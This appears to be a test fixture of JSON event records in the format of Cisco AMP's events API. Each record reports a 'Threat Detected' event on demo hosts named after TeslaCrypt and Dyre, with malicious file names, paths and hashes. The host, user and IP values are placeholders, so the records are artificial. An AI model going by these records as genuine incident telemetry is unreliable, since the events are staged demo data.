-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
